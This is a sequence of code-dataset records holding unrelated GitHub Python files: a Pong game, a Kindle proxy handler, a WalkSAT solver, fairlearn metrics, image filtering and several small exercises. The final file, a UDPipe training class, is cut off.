\"White\",\"White\")\n    canvas.draw_line([width/2,0],[width/2,height],1,'white')\n    canvas.draw_line([pad_width,0],[pad_width,height],1,'white')\n    canvas.draw_line([width-pad_width,0],[width-pad_width,height],1,'white')\n    canvas.draw_circle(ball_pos,radius,2,'red','white')\n    canvas.draw_text(str(score),(400,200),50,'red')\n    canvas.draw_text(str(score1),(200,200),50,'red')\n    \n    \nframe=simplegui.create_frame('pong',width,height)\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\nframe.start()\n    \n    \n    \n    \n    \n    \n    \n","repo_name":"gouthamkallempudi/ponggame","sub_path":"pong1.py","file_name":"pong1.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44505852054","text":"import logging\nimport xml.dom.minidom as minidom\n\nfrom handlers.upstream import Upstream\nfrom handlers.dummy import DummyResponse\nfrom handlers.ksp import _servers_config, _first_contact\nfrom handlers import is_uuid, TODO, TODO_PATH\nimport devices, calibre, qxml\nimport config, features\nimport annotations\nfrom annotations.lto import device_lto\n\n\ndef _rewrite_url(request, url):\n\t\"\"\"\n\tcertain responses from the server contain urls pointing to amazon services\n\twe rewrite them to point to our proxy\n\t\"\"\"\n\tif url and config.rewrite_rules:\n\t\tfor pattern, replacement in config.rewrite_rules(request).items():\n\t\t\tm = pattern.search(url)\n\t\t\tif m:\n\t\t\t\turl = url[:m.start()] + m.expand(replacement) + url[m.end():]\n\treturn url\n\ndef _add_item(x_items, action, item_type, key = 'NONE', text = None, priority = 600, sequence = 0, url = None, body = None, **kwargs):\n\titem = qxml.add_child(x_items, 'item')\n\titem.setAttribute('action', str(action))\n\titem.setAttribute('is_incremental', 'false')\n\titem.setAttribute('key', str(key))\n\titem.setAttribute('priority', str(priority))\n\titem.setAttribute('sequence', str(sequence))\n\titem.setAttribute('type', str(item_type))\n\tif url:\n\t\titem.setAttribute('url', url)\n\tif body:\n\t\tqxml.set_text(item, body)\n\telse:\n\t\tfor k, v in kwargs.items():\n\t\t\tqxml.add_child(item, k, str(v))\n\treturn item\n\ndef _filter_item(request, x_items, x_item):\n\taction = x_item.getAttribute('action')\n\titem_type = x_item.getAttribute('type')\n\n\tif action == 'UPLOAD':\n\t\tif item_type in ['MESG', 'LOGS'] and not features.allow_logs_upload:\n\t\t\tx_items.removeChild(x_item)\n\t\t\treturn True\n\t\titem_url = x_item.getAttribute('url')\n\t\tnew_url = _rewrite_url(request, item_url)\n\t\tif new_url != item_url:\n\t\t\tlogging.warn(\"rewrote url %s => %s\", item_url, new_url)\n\t\t\tx_item.setAttribute('url', new_url)\n\t\t\treturn True\n\t\treturn False\n\n\tif action == 'DOWNLOAD':\n\t\titem_key = x_item.getAttribute('key')\n\t\titem_url = x_item.getAttribute('url')\n\t\tif item_url and (item_type == 'CRED' or is_uuid(item_key)):\n\t\t\tnew_url = _rewrite_url(request, item_url)\n\t\t\tif new_url != item_url:\n\t\t\t\tlogging.warn(\"rewrote url for %s: %s => %s\", item_key, item_url, new_url)\n\t\t\t\tx_item.setAttribute('url', new_url)\n\t\t\t\treturn True\n\t\tlogging.warn(\"not rewriting url %s for %s\", item_url, item_key)\n\t\treturn False\n\n\tif action == 'GET':\n\t\tif item_type == 'FWUP' and not features.allow_firmware_updates:\n\t\t\tx_items.removeChild(x_item)\n\t\t\treturn True\n\n\tif action == 'SND' and item_type == 'CMND':\n\t\titem_key = x_item.getAttribute('key')\n\t\tif item_key and 
item_key.endswith(':SYSLOG:UPLOAD') and not features.allow_logs_upload:\n\t\t\t# not sure if this is smart, ignoring these items appears to queue them up at amazon\n\t\t\tx_items.removeChild(x_item)\n\t\t\treturn True\n\n\treturn False\n\ndef _consume_action_queue(request, device, x_items):\n\twas_updated = False\n\twhile device.actions_queue:\n\t\taction = device.actions_queue.pop()\n\t\t# logging.debug(\"checking action %s\", action)\n\t\tif list(qxml.filter(x_items, 'item', action = action[0], type = action[1])):\n\t\t\t# logging.debug(\"action %s already found in %s, skipping\", action, x_items)\n\t\t\tcontinue\n\t\tif action == 'SET_SCFG':\n\t\t\t_add_item(x_items, 'SET', 'SCFG', key = 'KSP.set.scfg', priority = 100, body = _servers_config(request, device))\n\t\t\twas_updated = True\n\t\telif action == 'UPLOAD_SNAP':\n\t\t\t_add_item(x_items, 'UPLOAD', 'SNAP', key = 'KSP.upload.snap', priority = 1000, url = config.server_url(request) + 'FionaCDEServiceEngine/UploadSnapshot')\n\t\t\twas_updated = True\n\t\t# elif action == 'GET_NAMS':\n\t\t# \t_add_item(x_items, 'GET', 'NAMS', key = 'NameChange' if device.is_kindle() else 'AliasChange')\n\t\t# \twas_updated = True\n\t\telif action == 'UPLOAD_SCFG':\n\t\t\t_add_item(x_items, 'UPLOAD', 'SCFG', key = 'KSP.upload.scfg', priority = 50, url = config.server_url(request) + 'ksp/scfg')\n\t\t\twas_updated = True\n\t\telif type(action) == tuple and action[0] == 'ADD_COLLECTION':\n\t\t\tpass\n\t\telse:\n\t\t\tlogging.warn(\"unknown action %s\", action)\n\treturn was_updated\n\ndef _update_annotations(device, x_items):\n\twas_updated = False\n\n\tfor lr in annotations.get_last_read_updates(device):\n\t\tsource_device = devices.get(lr.device)\n\t\tsource_device_alias = (source_device.alias or source_device.serial) if source_device else lr.device\n\t\t_add_item(x_items, 'UPD_LPRD', 'EBOK', key = lr.asin, priority = 1100, sequence = lr.pos,\n\t\t\t\tsource_device = source_device_alias, lto = device_lto(source_device), annotation_time_utc = lr.timestamp)\n\t\twas_updated = True\n\n\tfor asin in annotations.get_annotation_updates(device):\n\t\t_add_item(x_items, 'UPD_ANOT', 'EBOK', key = asin, priority = 1100)\n\t\twas_updated = True\n\n\treturn was_updated\n\ndef _process_xml(request, doc, device):\n\tx_response = qxml.get_child(doc, 'response')\n\tx_items = qxml.get_child(x_response, 'items')\n\tif not x_items:\n\t\treturn False\n\n\twas_updated = False\n\n\t# rewrite urls\n\tfor x_item in qxml.list_children(x_items, 'item'):\n\t\twas_updated |= _filter_item(request, x_items, x_item)\n\n\twas_updated |= _consume_action_queue(request, device, x_items)\n\twas_updated |= _update_annotations(device, x_items)\n\n\tif features.download_updated_books:\n\t\tfor book in calibre.books().values():\n\t\t\tif book.needs_update_on(device) and book.cde_content_type in ('EBOK', ): # PDOC updates are not supported ATM\n\t\t\t\tlogging.warn(\"book %s updated in library, telling device %s to download it again\", book, device)\n\t\t\t\t_add_item(x_items, 'GET', book.cde_content_type, key = book.asin, title = book.title, forced = True)\n\t\t\t\twas_updated = True\n\n\tif was_updated:\n\t\tx_total_count = qxml.get_child(x_response, 'total_count')\n\t\tqxml.set_text(x_total_count, len(x_items.childNodes))\n\n\treturn was_updated\n\ndef _service_refresh(request, device):\n\tbody = '00' + \\\n\t\t\t\t'\\n'\n\tbody += _servers_config(request, device)\n\tbody += '\\n'\n\treturn bytes(body, 'UTF-8')\n\n\n_POLL_BODY = b'00'\n_POLL_HEADERS = { 'Content-Type': 
'text/xml;charset=UTF-8' }\n\nclass TODO_GetItems (Upstream):\n\tdef __init__(self):\n\t\tUpstream.__init__(self, TODO, TODO_PATH + 'getItems')\n\n\tdef call(self, request, device):\n\t\tif request.headers['X-ADP-Reason'] == 'Poll':\n\t\t\treturn DummyResponse(headers = _POLL_HEADERS, data = _POLL_BODY)\n\t\tq = request.get_query_params()\n\t\treason = q.get('reason')\n\t\tif reason == 'Poll':\n\t\t\treturn DummyResponse(headers = _POLL_HEADERS, data = _POLL_BODY)\n\n\t\tif device.is_provisional():\n\t\t\t# tell the device to do a full snapshot upload, so that we can get the device serial and identify it\n\t\t\treturn DummyResponse(headers = _POLL_HEADERS, data = _first_contact(request, device))\n\n\t\tif reason == 'ServiceRefresh':\n\t\t\treturn DummyResponse(headers = _POLL_HEADERS, data = _service_refresh(request, device))\n\n\t\tlto = q.get('device_lto', -1)\n\t\tif lto != -1:\n\t\t\ttry: device.lto = int(lto)\n\t\t\texcept: pass\n\n\t\tresponse = self.call_upstream(request, device)\n\t\tif response.status == 200:\n\t\t\t# use default UTF-8 encoding\n\t\t\twith minidom.parseString(response.body_text()) as doc:\n\t\t\t\tif _process_xml(request, doc, device):\n\t\t\t\t\txml = doc.toxml('UTF-8')\n\t\t\t\t\tresponse.update_body(xml)\n\n\t\treturn response\n","repo_name":"pwr/KSP","sub_path":"src/handlers/get_items.py","file_name":"get_items.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"5"} +{"seq_id":"2537542865","text":"import socket\r\ns = socket.socket()\r\n\r\nhost = socket.gethostname()\r\nport = 1234\r\n\r\ns.connect((host, port))\r\nprint(s.recv(1024))\r\n#\r\n# from urllib.request import urlopen\r\n# webpage = urlopen('http:\\\\www.python.org')\r\n#\r\n# import re\r\n# text = webpage.read()\r\n# m = re.search(b'
about', text, re.IGNORECASE)\r\n# m.group()\r\n\r\n\r\n","repo_name":"ysy-hn/python","sub_path":"网络编程客户端.py","file_name":"网络编程客户端.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8369099532","text":"from __future__ import print_function\r\n\r\nimport MySQLdb as my\r\ntry:\r\n db = my.connect(host=\"localhost\",\r\n user=\"shikhagarg\",\r\n passwd=\"root\",\r\n db=\"world\")\r\n \r\n cursor = db.cursor()\r\n name = \"newcity\"\r\n cc = 'SNC'\r\n district = 'someyork'\r\n pop = 2232422\r\n \r\n data = [\r\n ('city1','MAC','dis1',23421),\r\n ('city2','sdf','dis2',23422),\r\n ('city3','sad','dis3',23424),\r\n ('city4','sdw','dis4',23423)]\r\n \r\n sql = \"insert into city(name,countrycode,district,population)\\\r\n values(%s,%s,%s,%s)\"\r\n \r\n num = cursor.executemany(sql,data)\r\n db.commit()\r\n db.close()\r\n\r\nexcept my.Error as e:\r\n print(e)\r\nexcept :\r\n print(\"Unknown error occured\")\r\n","repo_name":"shikhagarg0192/Python","sub_path":"mysql4.py","file_name":"mysql4.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"1042518877","text":"import pylablib\nID = 'Thorlabs.list_kinesis_devices()'\nfrom pylablib.devices import Thorlabs\ndef translate(s):\n output=''\n for character in s:\n temp=''\n if character.isdigit():\n c=0\n elif ord(character)==32:\n output+='1111 '\n else:\n с=87\n character=ord(character)-c\n while character > 0:\n temp += str(character % 3)\n character //= 3\n output+=temp[::-1].rjust(4,'0')+' '\n print('encode: ',output)\n encodetogrd(output)\n\ndef encodetogrd(s):\n output = ''\n grader = {\n '0': 45,\n '1': 67.5,\n '2': 90,\n ' ':''\n }\n for character in s:\n output+=grader[character]\n move(grader[character])\n print('Angle array: ', output)\n\ndef move(grad):\n Thorlabs.list_kinesis_devices()\n stage = Thorlabs.KinesisMotor(ID)\n stage.move_to(grad)\n\n\ndef calibration():\n stage = Thorlabs.KinesisMotor(ID)\n stage.home(sync=True)\n\nif __name__==\"__main__\":\n while True:\n translate(input('Enter your string:'))","repo_name":"pawelroza/translator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19024488303","text":"class Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n found = [None]\n # recurive check if [p,q] can be found in this tree\n def dfs(root):\n if not root:return False, False\n lp, lq = dfs(root.left)\n rp, rq = dfs(root.right)\n p_found = lp or rp or root.val == p.val\n q_found = lq or rq or root.val == q.val\n if p_found and q_found and not found[0]:\n found[0] = root\n return p_found, q_found\n dfs(root)\n return found[0]","repo_name":"yijencheng/Leetcode","sub_path":"tree/post-order/235_Lowest_Common_Ancestor_of_a_Binary_Search_Tree(post).py","file_name":"235_Lowest_Common_Ancestor_of_a_Binary_Search_Tree(post).py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43336877589","text":"# Implement an algorithm to find the kth to last element of a singly linked list.\n\nclass Node(object):\n\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\nclass SingleList(object):\n\n head = None\n tail = None\n\n 
def show(self):\n x = self.head\n while x is not None:\n print(x.data, end='')\n print(\" -> \", end='')\n x = x.next\n print(None)\n\n def append(self, data):\n new_node = Node(data, None)\n if self.head is None:\n self.head = self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n\n def remove(self, node_value):\n prev = None\n x = self.head\n while x is not None:\n if x.data == node_value:\n if prev is not None:\n prev.next = x.next\n else:\n self.head = x.next\n break\n else:\n prev = x\n x = x.next\n if x.next is None:\n self.tail = x\n if self.head is None:\n self.tail = None\n\n def is_empty(self):\n return self.head is None\n\n def remove_duplicates_with_buffer(self):\n letters = {}\n x = self.head\n prev = None\n while x is not None:\n try:\n letters[x.data]\n prev.next = x.next\n except KeyError:\n letters[x.data] = True\n prev = x\n x = x.next\n\n def remove_duplicates(self):\n x = self.head\n runner = x\n while x is not None:\n while runner.next is not None:\n if x.data == runner.next.data:\n runner.next = runner.next.next\n else:\n runner = runner.next\n x = x.next\n runner = x\n\n def find_k_recursevely(self, k):\n return self.find_k_recurse(k, self.head)[0]\n\n def find_k_recurse(self, k, x):\n if x is None:\n return (None, 0)\n k_data, cnt = self.find_k_recurse(k, x.next)\n if cnt == k:\n return (x.data, cnt+1)\n else:\n return (k_data, cnt+1)\n\n def find_k_with_2_passes(self, k):\n cnt = 0\n x = self.head\n while x is not None:\n cnt += 1\n x = x.next\n k = cnt - k\n cnt = 0\n x = self.head\n while x is not None:\n cnt += 1\n if cnt == k:\n return x.data\n x = x.next\n return None\n\n def find_k(self, k):\n p1 = self.head\n p2 = self.head\n cnt = 0\n while cnt != k:\n cnt += 1\n p2 = p2.next\n if p2 is None:\n return None\n while p2.next:\n p1 = p1.next\n p2 = p2.next\n return p1.data\n\n\nif __name__ == \"__main__\":\n ll = SingleList()\n ll.append(\"F\")\n ll.append(\"O\")\n ll.append(\"L\")\n ll.append(\"L\")\n ll.append(\"O\")\n ll.append(\"W\")\n ll.append(\" \")\n ll.append(\"U\")\n ll.append(\"P\")\n ll.show()\n print(ll.find_k_recursevely(3))\n print(ll.find_k_with_2_passes(3))\n print(ll.find_k(3))\n","repo_name":"bmpasini/CtCI-6th-Edition","sub_path":"chap-2/2.2.py","file_name":"2.2.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"5"} +{"seq_id":"28644482345","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 17 11:18:52 2021\r\n\r\n@author: Fred\r\n\"\"\"\r\nimport ananimlib as al\r\n\r\n\r\ngrid = al.CoordGrid([16,10], [16,10], [1,1],[.5,.5])\r\nrect = al.CompositeAnObject()\r\nabout = al.Dot()\r\narrow = al.Arrow([0,0], [0,0])\r\nrect.add_anobject(al.Rectangle([1,1]))\r\nrect.add_anobject(about)\r\n\r\nal.Animate(\r\n al.AddAnObject(grid),\r\n al.AddAnObject(rect),\r\n \r\n al.MoveTo(rect, [3,2],duration=1.0),\r\n \r\n al.SetAboutPoint(rect, [-2,-1]), \r\n)\r\nrect.add_anobject(arrow),\r\narrow.position=[0,0]\r\nal.Animate(\r\n\r\n al.RunParallel(\r\n al.MoveTo([rect,about],[-2,-1],duration=1.0),\r\n al.SlideAttribute([rect,arrow], 'head_pos', \r\n al.Vector([-2,-1]),duration=1.0)\r\n ),\r\n\r\n al.MoveTo(rect, [0,0],duration=1.0),\r\n al.Wait(1.0)\r\n)\r\n \r\nal.play_movie()\r\n","repo_name":"gtruch/ananimlib","sub_path":"docs/code/quickstart_ex6_1.py","file_name":"quickstart_ex6_1.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} 
+{"seq_id":"25975539573","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 26 20:10:17 2023\n\n@author: dhvilleg\n\"\"\"\n\nimport cv2\nimport numpy as np\n\nbananos = cv2.imread('/home/dhvilleg/Documents/proyectos/DeepVision/bananos.jpg')\n\ncv2.imshow(\"fOriginal\",bananos)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nkernel_3x3 = np.ones((3,3))/(3*3)\noutput_3x3 = cv2.filter2D(bananos, -1, kernel_3x3)\ncv2.imshow(\"filtrp 3x3\",output_3x3)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\nkernel_11x11 = np.ones((11,11))/(11*11)\noutput_11x11 = cv2.filter2D(bananos, -1, kernel_11x11)\ncv2.imshow(\"filtrp 11x11\",output_11x11)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nkernel_37x37 = np.ones((37,37))/(37*37)\noutput_37x37 = cv2.filter2D(bananos, -1, kernel_37x37)\ncv2.imshow(\"filtrp 37x37\",output_37x37)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nkernel_97x97 = np.ones((97,97))/(97*97)\noutput_97x97 = cv2.filter2D(bananos, -1, kernel_97x97)\ncv2.imshow(\"filtrp 97x97\",output_97x97)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"dhvilleg/MachineLearning_ClasificadorImagenes","sub_path":"filtrado_imagenes.py","file_name":"filtrado_imagenes.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10783995922","text":"import string\nimport random\n\nclass WalkSAT(object):\n \n def __init__(self, KB, file, p, max_flips):\n \n self.KB = KB;\n self.variables = file.variables;\n self.clauses = file.clauses;\n self.p = p;\n self.max_flips = max_flips;\n \n def search(self,):\n \n assign = {}\n List = list(string.ascii_uppercase[0:self.variables]);\n i = 1;\n while( len(List) != self.variables):\n List.append('A' + str(i));\n i = i +1\n \n # initiate all proposition symbols with random assignment\n assign = WalkSAT.random_gen_assign(self, assign, List);\n \n for i in range(0, self.max_flips):\n n = WalkSAT.check_clauses(self, assign)\n if self.clauses == n:\n return assign\n false_clauses = WalkSAT.false_clauses(self, assign);\n false_clause = WalkSAT.select_one(self, false_clauses);\n \n #choose from the two options randomly: 1. choose a random variable from the false_clause and change it in the assignment\n # 2. 
choose the variable which a value satisfies the most clauses in the KB\n        if_statement = random.choice([0]*int(self.p*10) + [1]*int((1-self.p)*10));\n        if if_statement == 0:\n            symbol = WalkSAT.random_value(self, false_clause) \n            assign = WalkSAT.change_model(self, assign, symbol);\n        else:\n            assign = WalkSAT.most_satisfied(self, assign, n, false_clause)\n\n    def change_model(self, assign, symbol):\n        #add the new variable with the new value from the random_value\n        #input: variable with value\n        #output: assignment with the new variable with value\n        \n        for i in symbol:\n            assign[i] = symbol[i];\n        return assign\n    \n    def random_value(self, clause):\n        #choose a random variable from a false clause\n        #input: a false_clause\n        #output: returns a variable with a value \n        \n        size = len(clause);\n        number = random.randint(0, size-1);\n        \n        count = 0;\n        for i in clause:\n            if count == number:\n                if clause[i] == True:\n                    value = clause[i];\n                    index = i;\n                if clause[i] == False:\n                    value = clause[i];\n                    index = i;\n            count = count + 1;\n        \n        symbol = {};\n        symbol[index] = value;\n        return symbol\n    \n    def select_one(self, false_clauses):\n        # select one of the false_clauses\n        #input: all the false clauses\n        #output: just one false clause\n        \n        size = len(false_clauses);\n        number = random.randint(0, size-1);\n        \n        false_clause = false_clauses[number];\n        return false_clause\n    \n    \n    def false_clauses(self, assign):\n        # find all of the clauses that are not satisfied by the assignment\n        #input: the assignment\n        #output: the set of clauses that are not satisfied\n        \n        KB = self.KB;\n        \n        clauses = [];\n        for i in range(0, len(KB)):\n            count = 0;\n            for j in KB[i]:\n                \n                if KB[i][j] == assign[j]:\n                    count = count + 1;\n            \n            if count == 0:\n                clauses.append(KB[i])\n        \n        return clauses; \n    \n\n    def random_gen_assign(self, assign, List):\n        #it generates randomly the values to the variables of the assignment.\n        #input: the assignment itself and the list of variables\n        #output: the assignment with the values of true and false assigned\n        \n        for i in range(0, self.variables):\n            randomValue = random.randint(0,1);\n            \n            if randomValue == 0:\n                assign[List[i]] = False;\n            if randomValue == 1:\n                assign[List[i]] = True;\n        \n        return assign \n    \n    def check_clauses(self, assign):\n        #check the clauses if they are being satisfied\n        #input: the assignment\n        #output: the clauses that are true\n        \n        KB = self.KB;\n        \n        clauses_true = 0;\n        for i in range(0, len(KB)):\n            count = 0;\n            for j in KB[i]:\n                \n                if KB[i][j] == assign[j]:\n                    count = count + 1;\n            \n            if count > 0:\n                clauses_true = clauses_true + 1;\n        \n        return clauses_true; \n    \n    \n    def most_satisfied(self, assign, n_max, false_clause):\n        #it returns the assignment that satisfies the most clauses\n        #input: assign, number of satisfied clauses, and all the false clauses\n        #output: new assignment\n        \n        old_assign = assign.copy();\n        new_assign = [];\n        \n        for j in false_clause:\n            assign = old_assign.copy();\n            for i in assign:\n                if j == i:\n                    if assign[i] == False:\n                        assign[i] = True;\n                        n = WalkSAT.check_clauses(self, assign);\n                        if n > n_max:\n                            new_assign = assign;\n                            n_max = n;\n                        continue;\n                    \n                    if assign[i] == True:\n                        assign[i] = False;\n                        n = WalkSAT.check_clauses(self, assign);\n                        if n > n_max:\n                            new_assign = assign;\n                            n_max = n;\n                        continue;\n        \n        if not new_assign:\n            return old_assign\n        else:\n            return new_assign \n    \n    
","repo_name":"NunoDuarte/python_projects","sub_path":"SAT_algorithm/WalkSAT.py","file_name":"WalkSAT.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"37153630326","text":"import fairlearn\nimport pandas as pd\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\n#from fairlearn.metrics import selection_rate, false_positive_rate, true_positive_rate, count\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score\n#from fairlearn.metrics import MetricFrame\nimport sklearn.metrics as skm\nimport sys\n\npathway = Path()\nfilename = sys.argv[1]\nprint(filename)\nfile_total = pathway.glob(f\"{filename}\").__next__()\ndf_total=pd.read_csv(file_total,header=None,names=[\"name\",\"PLDDT\",\"ss\"],sep ='\\s+')\n\nprint(df_total.head(10))\n\ndf_total = df_total.dropna()\nprint(df_total)\n\n# create y_true so that the prediction is true if PLDDT > 80\ndf_total.loc[df_total['PLDDT'].astype(int) >= 80, 'y_true' ] = 1\ndf_total.loc[df_total['PLDDT'].astype(int) < 80, 'y_true' ] = 1\ndf_total['y_true'] = df_total['y_true'].astype(int)\nprint(df_total)\n\n# create y_pred so that the prediction is correct if PLDDT > 80\ndf_total.loc[df_total['PLDDT'].astype(int) >= 80, 'y_pred' ] = 1\ndf_total.loc[df_total['PLDDT'].astype(int) < 80, 'y_pred' ] = 0\ndf_total['y_pred'] = df_total['y_pred'].astype(int)\nprint(df_total)\n\n\nfrom fairlearn.metrics import MetricFrame\n#import sklearn.metrics as skm\n\ny_true = df_total['y_true']\ny_pred = df_total['y_pred']\ngroup_membership_data = df_total['ss']\ngrouped_metric = MetricFrame(metrics=skm.recall_score,y_true=y_true,y_pred=y_pred,sensitive_features=group_membership_data)\n\nprint(\"Overall recall = \", grouped_metric.overall)\nprint(\"recall by groups = \", grouped_metric.by_group.to_dict())\n\n\nfrom fairlearn.metrics import selection_rate, false_positive_rate, true_positive_rate, count\n#from sklearn.metrics import accuracy_score, precision_score, recall_score\n\n\n# 'false positive rate': false_positive_rate,\nmetrics = {\n 'accuracy': accuracy_score,\n 'precision': precision_score,\n 'recall': recall_score,\n 'true positive rate': true_positive_rate,\n 'selection rate': selection_rate,\n 'count': count}\n\nmetric_frame = MetricFrame(metrics=metrics,y_true=y_true,y_pred=y_pred,sensitive_features=group_membership_data)\n\next = filename[-3:]\nif ext == 'csv':\n title='Secondary structures'\nelif ext == 'dat':\n title='Residues'\nelse:\n print('Verify the filename extension')\n\n\nmetric_frame.by_group.plot.bar(\n subplots=True,\n layout=[3, 3],\n legend=False,\n figsize=[12, 8],\n title=f\"Group metrics for {title}\", \n)\n\nplt.savefig(f'{title}_fairness', facecolor=\"white\", bbox_inches=\"tight\", dpi=600)\n","repo_name":"Usmanovsky/md-scripts","sub_path":"alpha-fold/fairlearn/flearn.py","file_name":"flearn.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"16758052924","text":"'''\nInvestigating numbers that can be expressed as the sum of a prime square, cube,\nand fourth power?\n'''\n\nimport intlib\n\n\ndef main():\n TARGET = 50000000\n primes = intlib.primes(int(TARGET ** 0.5))\n p_squares = [p ** 2 for p in primes if p ** 2 <= TARGET]\n p_cubes = [p ** 3 for p in primes if p ** 3 <= TARGET]\n p_fths = [p ** 4 for p in primes if p ** 4 <= TARGET]\n ans = set()\n for a in p_squares:\n for b in p_cubes:\n for c in p_fths:\n if 
a + b + c <= TARGET:\n ans.add(a + b + c)\n\n return len(ans)\n\n\nif __name__ == '__main__':\n import time\n t1 = time.time()\n print(main())\n t2 = time.time()\n print('{:.3f} s'.format(t2 - t1))\n","repo_name":"tasusu/ProjectEuler","sub_path":"problem87.py","file_name":"problem87.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"70545159831","text":"#!/usr/bin/env python3\n\"\"\"Starts program and handles input\"\"\"\n\nimport argparse\nfrom pathlib import Path\nimport sys\nfrom dotenv import load_dotenv\n\n# import like this so we can call files in another folder\nsys.path.append('./')\nimport internal_py.setup as setup\nimport internal_py.caterpillar as caterpillar\n\ndef main():\n \"\"\"Performs general setup and call appropriate application\"\"\"\n\n # load configuration\n env_path = Path('.') / 'configs' / '.env'\n load_dotenv(dotenv_path=env_path)\n\n # setup logger\n setup.setup_logger()\n\n # start up the server and run forever\n caterpillar.run()\n\n\n\n# Not current use\ndef select_app():\n \"\"\"Parses input flags to determine which program to run\"\"\"\n\n # Construct the argument parser\n parser = argparse.ArgumentParser()\n\n # Add the arguments to the parser\n parser.add_argument(\"-news\", action='store_true', help=\"Run Newspaper3k server\")\n parser.add_argument(\"-text\", action='store_true', help=\"Run text processing server\")\n flags = parser.parse_args()\n\n return flags\n\n# Default program entry point\nif __name__ == \"__main__\":\n main()\n ","repo_name":"wpwilson10/Caterpillar","sub_path":"cmd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27692402582","text":"import sys\nimport os\nimport openslide\nimport cv2 as cv\n\ndef getRect(positions):\n\tx_s = [];\n\ty_s = [];\n\tfor length in range(0,len(positions)):\n\t\tx_s.append(positions[length][0]);\n\t\ty_s.append(positions[length][1]);\n\tx_min = min(x_s);\n\tx_max = max(x_s);\n\ty_min = min(y_s);\n\ty_max = max(y_s);\n\treturn (x_min,y_min,x_max-x_min,y_max-y_min);\n\ndef readRegionsFromXml(xmlFileName):\n\tsrcHandle = open(xmlFileName,'r');\n\tsrcString = srcHandle.read();\n\tstrArray = srcString.split(\"\\n\");\n\tregions = [];\n\tregionId = 0;\n\trecordStart = False;\n\tfor line in range(0,len(strArray)):\n\t\t# print(strArray[line].lstrip());\n\t\tcurrent = strArray[line].lstrip();\n\t\tif current == '':\n\t\t\t# record end\n\t\t\tregionId +=1;\n\t\t\trecordStart = False;\n\t\tif recordStart:\n\t\t\tcurrent = current.replace('\"','');\n\t\t\tcoordirate = current.split(\" \");\n\t\t\t# print(coordirate);\n\t\t\tx = int((coordirate[1].split(\"=\"))[1]);\n\t\t\ty = int((coordirate[2].split(\"=\"))[1]);\n\t\t\tregions[regionId].append((x,y));\n\t\tif current == '':\n\t\t\t# record start\n\t\t\trecordStart = True;\n\t\t\tregions.append([]);\n\n\t# print(len(regions));\n\trects = [];\n\tfor regionId in range(0,len(regions)):\n\t\trect = getRect(regions[regionId]);\n\t\trects.append(rect);\n\treturn rects;\n\ndef main(argv):\n\tif len(argv) < 4:\n\t\tusage=\"Usage: \\n 3 Parameters are needed:\\n 1st is the svs file;\\n 2nd is the xml file;\\n 3rd is the output folder. 
\"\n\t\tprint(usage);\n\t\treturn False;\n\tsvsFileName = argv[1];\n\txmlFileName = argv[2];\n\toutputFolderPath = argv[3];\n\tsvsBaseName = os.path.basename(svsFileName).split('.')[0];\n\ttargetRects = readRegionsFromXml(xmlFileName);\n\tslide = openslide.OpenSlide(svsFileName);\n\tfor rect in targetRects:\n\t\ttargetImage = slide.read_region((rect[0],rect[1]),0, (rect[2],rect[3]),3);\n\t\tpath = os.path.join(outputFolderPath,svsBaseName+\"_\"+str(rect)+\".png\");\n\t\tcv.imwrite(path,targetImage);\n\t\nif __name__ == '__main__':\n main(sys.argv)\n\n\n\n\n\n\n\n","repo_name":"kitrol/Lymph","sub_path":"pythonNewTry/parseXml.py","file_name":"parseXml.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25764546736","text":"import re\nimport string\nfrom corpy.udpipe import Model\nfrom corpy.udpipe import pprint\nfrom typing import List\nfrom result import Result\nfrom store import Store\nfrom util import db_config,language_dict\nfrom mysql.connector import errorcode\n\n\nclass Udtrain(object):\n def __init__(self,modelName,corpusName,language):\n self.modelName = modelName\n 